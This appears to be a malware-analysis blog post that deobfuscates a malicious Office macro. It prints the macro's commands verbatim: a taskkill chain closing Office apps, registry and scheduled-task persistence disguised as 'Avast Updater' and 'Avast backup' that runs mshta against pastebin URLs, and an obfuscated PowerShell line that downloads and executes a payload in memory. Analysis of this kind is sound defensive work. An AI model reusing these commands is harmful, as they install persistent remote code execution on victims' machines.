Part 1: Getting through the macros.
We left off looking at the code below. It is split up into four distinct parts and we’ll look at each one in turn.
Part 1: Kill Microsoft
This one is not that complicated. Create the shell object (line 58), put the command string in a variable (line 60), and run it in line 61. Here’s the full string in line 60. Notice how it’s killing a variety of Microsoft apps:
cmd.exe /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & exit
Part 2: Writing to the registry
Again, not too complicated. All it is doing is creating a registry key called “WinUpdate” and using mshta.exe to go to ANOTHER pastebin site and download stuff. I guess we’d better check that one out, too.
And here we go again! Five rounds later we get…
self.close? I have no idea why that would be put in the run registry, but there we go.
Part 3.1: Avast Updater
So rather than the run registry, let’s make a scheduled task instead! Line 72 is where the magic happens
69: X_hw0 "schtasks /create /sc MINUTE /mo 300 /t" 70: X_hw1 "n ""Avast Updater"" /tr ""mshta.ex" 71: X_hw2 "e http://pastebin.com/raw/B6DMsewR /F " 72: X_hw schtasks /create /sc MINUTE /mo 300 /tn ""Avast Updater"" /tr ""mshta.exe http://pastebin.com/raw/B6DMsewR /F
Using schtasks.exe, a new task is created (/create), using a schedule (/sc) of minutes, running every 300 minutes (/mo), with a task name (/tn) of “Avast Updater”, and will be running the following command (/tr) “mshta.exe http://pastebin…
Part 3.2: The executable
… four rounds of CyberChef later, we get…
This will be very similar to the ones above. Here it is all laid out and reversed (when necessary):
104: D_XA1 "raw/eD7Nj8tL" 105: D_XA2 "'').replace(''!@#'',''0x'')'));[AppDomain]::CurrentDomain.Load($sc64).EntryPoint.invoke($S,$X)" 106: D_XA0 "Powershell.exe -noexit [Byte]$sc64= iex(iex('(&(GCM *W-O*)'+ 'Net.'+'WebC'+'lient)'+'.Dow'+'nload'+'Str'+'ing(''https://pastebin.com/" 107: D_XA Powershell.exe -noexit [Byte]$sc64= iex(iex('(&(GCM *W-O*)Net.WebClient).DownloadString('https://pastebin.com/raw/eD7Nj8tL ').replace(''!@#'',''0x'')'));[AppDomain]::CurrentDomain.Load($sc64).EntryPoint.invoke($S,$X)
Line 106 is a long one and needs some explanation.
Variable $sc64 is going to be created as a byte array. iex means the same thing as Invoke-Expression. GCM *W-O* is an obfuscated way of running this instead: Get-Command New-Object. The contents of YET ANOTHER pastebin page is downloaded, only the characters !@# are replaced with a 0x. It is then loaded up and executed.
No! It’s the actual executable! We can now see why the !@# was replaced with a 0x. And if you recall the scheduled task named Avast Updater, this will be downloaded and executed every 300 minutes.
Part 4: Avast backup
This looks familiar.
77: P_wx0 "schtasks /create /sc MINUTE /mo 300 /t" 78: P_wx1 "n ""Avast backup"" /tr ""mshta.ex" 79: P_wx2 "e http://pastebin.com/raw/pQiwYgDK"" /F " 80: P_wx "schtasks /create /sc MINUTE /mo 300 /tn ""Avast backup"" /tr ""mshta.exe http://pastebin.com/raw/pQiwYgDK"" /F "
Another self.close? Well, at this point, I’ll take it.
That’s it for now! Thanks for reading.